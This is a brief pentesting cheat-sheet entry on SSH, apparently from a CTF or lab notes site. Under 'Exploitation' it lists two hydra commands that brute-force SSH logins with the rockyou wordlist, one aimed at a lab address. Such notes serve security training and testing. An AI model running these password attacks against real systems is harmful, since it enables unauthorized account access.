SSH (Secure Socket Shell)
Nice replacement for telnet
Exploitation
Password cracking with hydra
hydra -t 16 -l <USERNAME> -P /usr/share/wordlists/rockyou.txt -vV <IP-ADDRESS> ssh
hydra -l <USERNAME> -P /usr/share/wordlists/rockyou.txt ssh://10.10.37.123:22
Last updated
Was this helpful?